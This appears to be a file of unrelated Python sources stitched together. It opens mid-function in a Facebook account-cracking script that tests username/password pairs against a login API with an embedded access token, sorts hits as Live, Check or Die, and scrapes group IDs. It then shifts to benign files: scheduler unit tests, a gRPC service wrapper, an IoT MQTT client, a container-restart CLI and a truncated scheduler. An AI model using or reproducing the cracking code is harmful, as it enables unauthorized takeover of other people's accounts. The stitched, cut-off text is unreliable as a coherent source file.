url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
if __name__=='__main__':
masuk()
|
test_sched.py
|
import queue
import sched
import time
import unittest
try:
import threading
except ImportError:
threading = None
TIMEOUT = 10
class Timer:
def __init__(self):
self._cond = threading.Condition()
self._time = 0
self._stop = 0
def time(self):
with self._cond:
return self._time
# increase the time but not beyond the established limit
def sleep(self, t):
assert t >= 0
with self._cond:
t += self._time
while self._stop < t:
self._time = self._stop
self._cond.wait()
self._time = t
# advance time limit for user code
def advance(self, t):
assert t >= 0
with self._cond:
self._stop += t
self._cond.notify_all()
class TestCase(unittest.TestCase):
def test_enter(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.5, 0.4, 0.3, 0.2, 0.1]:
z = scheduler.enter(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.1, 0.2, 0.3, 0.4, 0.5])
def test_enterabs(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_enter_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
scheduler.enter(1, 1, fun, (1,))
scheduler.enter(3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
for x in [4, 5, 2]:
z = scheduler.enter(x - 1, 1, fun, (x,))
timer.advance(2)
self.assertEqual(q.get(timeout=TIMEOUT), 2)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 5)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 5)
def test_priority(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for priority in [1, 2, 3, 4, 5]:
z = scheduler.enterabs(0.01, priority, fun, (priority,))
scheduler.run()
self.assertEqual(l, [1, 2, 3, 4, 5])
def test_cancel(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
event1 = scheduler.enterabs(now + 0.01, 1, fun, (0.01,))
event2 = scheduler.enterabs(now + 0.02, 1, fun, (0.02,))
event3 = scheduler.enterabs(now + 0.03, 1, fun, (0.03,))
event4 = scheduler.enterabs(now + 0.04, 1, fun, (0.04,))
event5 = scheduler.enterabs(now + 0.05, 1, fun, (0.05,))
scheduler.cancel(event1)
scheduler.cancel(event5)
scheduler.run()
self.assertEqual(l, [0.02, 0.03, 0.04])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_cancel_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
now = timer.time()
event1 = scheduler.enterabs(now + 1, 1, fun, (1,))
event2 = scheduler.enterabs(now + 2, 1, fun, (2,))
event4 = scheduler.enterabs(now + 4, 1, fun, (4,))
event5 = scheduler.enterabs(now + 5, 1, fun, (5,))
event3 = scheduler.enterabs(now + 3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
scheduler.cancel(event2)
scheduler.cancel(event5)
timer.advance(1)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 4)
def test_empty(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
self.assertTrue(scheduler.empty())
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
self.assertFalse(scheduler.empty())
scheduler.run()
self.assertTrue(scheduler.empty())
def test_queue(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
e5 = scheduler.enterabs(now + 0.05, 1, fun)
e1 = scheduler.enterabs(now + 0.01, 1, fun)
e2 = scheduler.enterabs(now + 0.02, 1, fun)
e4 = scheduler.enterabs(now + 0.04, 1, fun)
e3 = scheduler.enterabs(now + 0.03, 1, fun)
# queue property is supposed to return an order list of
# upcoming events
self.assertEqual(scheduler.queue, [e1, e2, e3, e4, e5])
def test_args_kwargs(self):
flag = []
def fun(*a, **b):
flag.append(None)
self.assertEqual(a, (1,2,3))
self.assertEqual(b, {"foo":1})
scheduler = sched.scheduler(time.time, time.sleep)
z = scheduler.enterabs(0.01, 1, fun, argument=(1,2,3), kwargs={"foo":1})
scheduler.run()
self.assertEqual(flag, [None])
def test_run_non_blocking(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [10, 9, 8, 7, 6]:
scheduler.enter(x, 1, fun, (x,))
scheduler.run(blocking=False)
self.assertEqual(l, [])
if __name__ == "__main__":
unittest.main()
|
nighthawk_grpc_service.py
|
import logging
import socket
import subprocess
import tempfile
import threading
import time
from common import IpVersion
# TODO(oschaaf): unify some of this code with the test server wrapper.
class NighthawkGrpcService(object):
"""
Class for running the Nighthawk gRPC service in a separate process.
Usage:
grpc_service = NighthawkGrpcService("/path/to/nighthawk_service"), "127.0.0.1", IpVersion.IPV4)
if grpc_service.start():
.... You can talk to the Nighthawk gRPC service at the 127.0.0.1:grpc_service.server_port ...
Attributes:
server_ip: IP address used by the gRPC service to listen.
server_port: An integer, indicates the port used by the gRPC service to listen. 0 means that the server is not listening.
"""
def __init__(self, server_binary_path, server_ip, ip_version):
"""Initializes Nighthawk gRPC service.
Args:
server_binary_path: A string, indicates where the nighthawk gRPC service binary resides
server_ip: IP address, indicates which ip address should be used by the gRPC service listener.
ip_version: IP Version, indicates if IPv4 or IPv6 should be used.
...
"""
assert ip_version != IpVersion.UNKNOWN
self.server_port = 0
self.server_ip = server_ip
self._server_process = None
self._ip_version = ip_version
self._server_binary_path = server_binary_path
self._socket_type = socket.AF_INET6 if ip_version == IpVersion.IPV6 else socket.AF_INET
self._server_thread = threading.Thread(target=self._serverThreadRunner)
self._address_file = None
def _serverThreadRunner(self):
with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".tmp") as tmp:
self._address_file = tmp.name
args = [
self._server_binary_path, "--listener-address-file", self._address_file, "--listen",
"%s:0" % str(self.server_ip)
]
logging.info("Nighthawk grpc service popen() args: [%s]" % args)
self._server_process = subprocess.Popen(args)
self._server_process.communicate()
self._address_file = None
def _waitUntilServerListening(self):
tries = 30
while tries > 0:
contents = ""
try:
with open(self._address_file) as f:
contents = f.read().strip()
except IOError:
pass
if contents != "":
tmp = contents.split(":")
assert (len(tmp) >= 2)
self.server_port = int(tmp[len(tmp) - 1])
return True
time.sleep(0.5)
tries -= 1
logging.error("Timeout while waiting for server listener at %s:%s to accept connections.",
self.server_ip, self.server_port)
return False
def start(self):
"""
Starts the Nighthawk gRPC service. Returns True upon success, after which the server_port attribute
can be queried to get the listening port.
"""
self._server_thread.daemon = True
self._server_thread.start()
return self._waitUntilServerListening()
def stop(self):
"""
Signals the Nighthawk gRPC service to stop, waits for its termination, and returns the exit code of the associated process.
"""
self._server_process.terminate()
self._server_thread.join()
self.server_port = 0
return self._server_process.returncode
|
tb_device_mqtt.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import ssl
import time
from simplejson import loads, dumps
from threading import RLock
from threading import Thread
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
import paho.mqtt.client as paho
from jsonschema import Draft7Validator
from jsonschema import ValidationError
KV_SCHEMA = {
"type": "object",
"patternProperties":
{
".": {"type": ["integer",
"string",
"boolean",
"number"]}
},
"minProperties": 1,
}
SCHEMA_FOR_CLIENT_RPC = {
"type": "object",
"patternProperties":
{
".": {"type": ["integer",
"string",
"boolean",
"number"]}
},
"minProperties": 0,
}
TS_KV_SCHEMA = {
"type": "object",
"properties": {
"ts": {
"type": ["integer"]
},
"values": KV_SCHEMA
},
"additionalProperties": False
}
DEVICE_TS_KV_SCHEMA = {
"type": "array",
"items": TS_KV_SCHEMA
}
DEVICE_TS_OR_KV_SCHEMA = {
"type": "array",
"items": {
"anyOf":
[
TS_KV_SCHEMA,
KV_SCHEMA
]
}
}
RPC_VALIDATOR = Draft7Validator(SCHEMA_FOR_CLIENT_RPC)
KV_VALIDATOR = Draft7Validator(KV_SCHEMA)
TS_KV_VALIDATOR = Draft7Validator(TS_KV_SCHEMA)
DEVICE_TS_KV_VALIDATOR = Draft7Validator(DEVICE_TS_KV_SCHEMA)
DEVICE_TS_OR_KV_VALIDATOR = Draft7Validator(DEVICE_TS_OR_KV_SCHEMA)
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
log = logging.getLogger("tb_connection")
log.setLevel(logging.DEBUG)
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, port=1883, token=None):
self._client = paho.Client()
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
def _on_log(self, client, userdata, level, buf):
log.exception(buf)
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, rc):
log.debug(client)
log.debug("Disconnected")
def _on_connect(self, client, userdata, flags, rc, *extra_params):
result_codes = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
if self.__connect_callback:
self.__connect_callback(client, userdata, flags, rc, *extra_params)
if rc == 0:
self.__is_connected = True
log.info("connection SUCCESS")
log.debug(client)
self._client.subscribe(ATTRIBUTES_TOPIC, qos=1)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", 1)
self._client.subscribe(RPC_REQUEST_TOPIC + '+')
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=1)
else:
if rc in result_codes:
log.error("connection FAIL with error {rc} {explanation}".format(rc=rc,
explanation=result_codes[rc]))
else:
log.error("connection FAIL with unknown error")
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None, key_file=None, keepalive=60):
if tls:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
self._on_decoded_message(content, message)
@staticmethod
def validate(validator, data):
try:
validator.validate(data)
except ValidationError as e:
log.error(e)
raise e
def _on_decoded_message(self, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
if self.__device_sub_dict.get("*"):
for x in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][x])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for x in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][x])
for res in dict_results:
res(content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC+"/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=1, wait_for_publish=False):
if quality_of_service != 0 and quality_of_service != 1:
log.error("Quality of service (qos) value must be 0 or 1")
return
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
self.validate(RPC_VALIDATOR, params)
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=1)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos != 0 and qos != 1:
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
else:
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=1):
if type(telemetry) is not list:
telemetry = [telemetry]
self.validate(DEVICE_TS_OR_KV_VALIDATOR, telemetry)
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=1):
self.validate(KV_VALIDATOR, attributes)
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for x in self.__device_sub_dict:
if self.__device_sub_dict[x].get(subscription_id):
del self.__device_sub_dict[x][subscription_id]
log.debug("Unsubscribed from {attribute}, subscription id {sub_id}".format(attribute=x,
sub_id=subscription_id))
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v is not {})
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to {key} with id {id}".format(key=key, id=self.__device_max_sub_id))
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(self.__attr_request_number),
payload=dumps(msg),
qos=1)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, ts):
self.__timeout_queue.put({"ts": ts, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
try:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
else:
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(None, TBTimeoutException("Timeout while waiting for reply from ThingsBoard!"))
else:
time.sleep(0.01)
except Exception as e:
log.warning(e)
|
cli.py
|
# coding:utf-8
import sys
import logging
import argparse
import threading
import time
import os
from six.moves import queue
from captain_comeback.index import CgroupIndex
from captain_comeback.cgroup import Cgroup
from captain_comeback.restart.engine import RestartEngine, restart
from captain_comeback.activity.engine import ActivityEngine
logger = logging.getLogger()
DEFAULT_ROOT_CG = "/sys/fs/cgroup/memory/docker"
DEFAULT_ACTIVITY_DIR = "/var/log/container-activity"
DEFAULT_SYNC_TARGET_INTERVAL = 1
DEFAULT_RESTART_GRACE_PERIOD = 10
def run_loop(root_cg_path, activity_path, sync_target_interval,
restart_grace_period):
threading.current_thread().name = "index"
job_queue = queue.Queue()
activity_queue = queue.Queue()
index = CgroupIndex(root_cg_path, job_queue, activity_queue)
index.open()
restarter = RestartEngine(restart_grace_period, job_queue, activity_queue)
restarter_thread = threading.Thread(target=restarter.run, name="restarter")
restarter_thread.daemon = True
activity = ActivityEngine(activity_path, activity_queue)
activity_thread = threading.Thread(target=activity.run, name="activity")
activity_thread.daemon = True
# Now, fire an initial sync, then empty the activity queue (we don't want
# to fire notifications for "new" containers if Captain Comeback is the one
# that's starting), and start all worker threads.
index.sync()
while True:
try:
activity_queue.get_nowait()
except queue.Empty:
break
restarter_thread.start()
activity_thread.start()
while True:
index.sync()
next_sync = time.time() + sync_target_interval
while True:
poll_timeout = next_sync - time.time()
if poll_timeout <= 0:
break
logger.debug("poll with timeout: %s", poll_timeout)
index.poll(poll_timeout)
for thread in [activity_thread, restarter_thread]:
if not thread.is_alive():
logger.critical("thread %s is dead", thread.name)
return 1
return 0
def restart_one(root_cg, grace_period, container_id):
q = queue.Queue()
cg = Cgroup(os.path.join(root_cg, container_id))
try:
restart(grace_period, cg, q, q)
except IOError:
logger.error("%s: container does not exist", cg.name())
return 1
finally:
while not q.empty():
m = q.get()
logger.debug("%s: received %s", cg.name(), m.__class__.__name__)
return 0
def main_wrapper(args):
desc = "Autorestart containers that exceed their memory allocation"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("--root-cg",
default=DEFAULT_ROOT_CG,
help="parent cgroup (children will be monitored)")
parser.add_argument("--activity",
default=DEFAULT_ACTIVITY_DIR,
help="where to log activity")
parser.add_argument("--sync-interval",
default=DEFAULT_SYNC_TARGET_INTERVAL, type=float,
help="target sync interval to refresh cgroups")
parser.add_argument("--restart-grace-period",
default=DEFAULT_RESTART_GRACE_PERIOD, type=int,
help="how long to wait before sending SIGKILL")
parser.add_argument("--debug", default=False, action="store_true",
help="enable debug logging")
parser.add_argument("--restart", dest="container_id",
help="restart one container and exit")
ns = parser.parse_args(args)
log_level = logging.DEBUG if ns.debug else logging.INFO
log_format = "%(asctime)-15s %(levelname)-8s %(threadName)-10s -- " \
"%(message)s"
logging.basicConfig(level=log_level, format=log_format)
logger.setLevel(log_level)
sync_interval = ns.sync_interval
if sync_interval < 0:
logger.warning("invalid sync interval %s, must be > 0", sync_interval)
sync_interval = DEFAULT_SYNC_TARGET_INTERVAL
restart_grace_period = ns.restart_grace_period
if restart_grace_period < 0:
logger.warning("invalid restart grace period %s, must be > 0",
restart_grace_period)
restart_grace_period = DEFAULT_RESTART_GRACE_PERIOD
# If the --restart argument is present, just restart one container and
# exit.
if ns.container_id:
return restart_one(ns.root_cg, restart_grace_period, ns.container_id)
# Otherwise the --restart argument was not there, start the main loop.
return run_loop(ns.root_cg, ns.activity, sync_interval,
restart_grace_period)
def cli_entrypoint():
sys.exit(main_wrapper(sys.argv[1:]))
if __name__ == "__main__":
cli_entrypoint()
|
scheduler.py
|
import calendar
import ctypes
import datetime
import logging
import sched
import threading
from threading import Thread
from typing import Callable, List
from crontab import CronTab
from injector import Module, inject, singleton
from prometheus_client.metrics import Gauge
from rep0st.framework.execute import execute
from rep0st.framework.signal_handler import on_shutdown
log = logging.getLogger(__name__)
framework_scheduler_tasks_running_z = Gauge(
'framework_scheduler_tasks_running', 'Number of tasks currently running.')
framework_scheduler_tasks_scheduled_z = Gauge(
'framework_scheduler_tasks_scheduled',
'Number of tasks scheduled to be run in the future.')
framework_scheduler_exit_z = Gauge('framework_scheduler_exit',
'Set to 1 if the scheduler is marked exit.')
class SchedulerModule(Module):
def configure(self, binder):
binder.bind(Scheduler)
class _SignalFinish(Exception):
pass
class _Schedule:
crontab: CronTab = None
@classmethod
def from_str(cls, timespec: str):
s = _Schedule()
if timespec != 'oneshot':
s.crontab = CronTab(timespec)
return s
def next(self, now: datetime.datetime):
if self.crontab:
return self.crontab.next(now=now, delta=False, default_utc=True)
else:
return now
def should_loop(self):
return self.crontab
@singleton
class Scheduler:
exit = threading.Event
scheduler = sched.scheduler
running_tasks = List[Thread]
@inject
def __init__(self) -> None:
self.exit = threading.Event()
self.scheduler = sched.scheduler(self._get_utc_time, self.exit.wait)
self.running_tasks = []
framework_scheduler_tasks_running_z.set_function(
lambda: len(self.running_tasks))
framework_scheduler_tasks_scheduled_z.set_function(
lambda: len(self.scheduler.queue))
framework_scheduler_exit_z.set_function(lambda: self.exit.is_set())
def _get_utc_time(self) -> float:
dts = datetime.datetime.utcnow()
return calendar.timegm(dts.utctimetuple()) + dts.microsecond / 1e6
def _run_task(self, schedule: _Schedule, fun: Callable[[], None]) -> None:
log.debug(f'Executing job {fun.__module__}.{fun.__name__}')
try:
fun()
except _SignalFinish:
pass
except:
log.exception(f'Error executing job {fun.__name__}')
finally:
if not self.exit.is_set():
if not schedule.should_loop():
log.debug(f'Task {fun} will not be scheduled again')
else:
self._schedule_task(schedule, fun)
self.running_tasks.remove(threading.current_thread())
def _schedule_handler(self, schedule: _Schedule, fun: Callable[[],
None]) -> None:
thread = Thread(
name=f'Job {fun.__module__}.{fun.__name__}',
